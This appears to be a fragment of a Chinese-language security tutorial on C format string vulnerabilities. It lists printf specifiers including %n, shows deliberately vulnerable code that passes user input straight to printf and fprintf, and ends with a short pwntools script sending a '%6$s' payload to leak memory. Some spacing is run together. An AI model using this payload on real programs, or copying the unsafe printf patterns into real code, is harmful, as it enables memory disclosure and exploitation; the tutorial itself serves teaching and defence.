%08x —>8hexbytes%d —>Entire%u —>Unsigned%s —>String%p —>Pointer%n —>Numberofwrittenbytes%hn —>Occupies2bytesinsteadof4<n>$X —> Direct access, Example: ("%3$d",var1,var2,var3) —> Access to var3
示例:
漏洞示例:
char buffer[30];gets(buffer); // Dangerous: takes user input without restrictions.printf(buffer); // If buffer contains "%x", it reads from the stack.
正常使用:
int value =1205;printf("%x%x%x", value, value, value); // Outputs: 4b5 4b5 4b5
缺失参数:
printf("%x%x%x", value); // Unexpected output: reads random values from the stack.
fprintf 漏洞:
#include<stdio.h>intmain(int argc,char*argv[]) {char*user_input;user_input = argv[1];FILE *output_file =fopen("output.txt","w");fprintf(output_file, user_input); // The user input can include formatters!fclose(output_file);return0;}
访问指针
格式 %<n>$x,其中 n 是一个数字,允许指示 printf 选择第 n 个参数(来自栈)。因此,如果您想使用 printf 读取栈中的第 4 个参数,可以这样做:
from pwn import*p =process('./bin')payload =b'%6$s'#4th parampayload +=b'xxxx'#5th param (needed to fill 8bytes with the initial input)payload +=p32(0x8048000)#6th paramp.sendline(payload)log.info(p.clean())# b'\x7fELF\x01\x01\x01||||'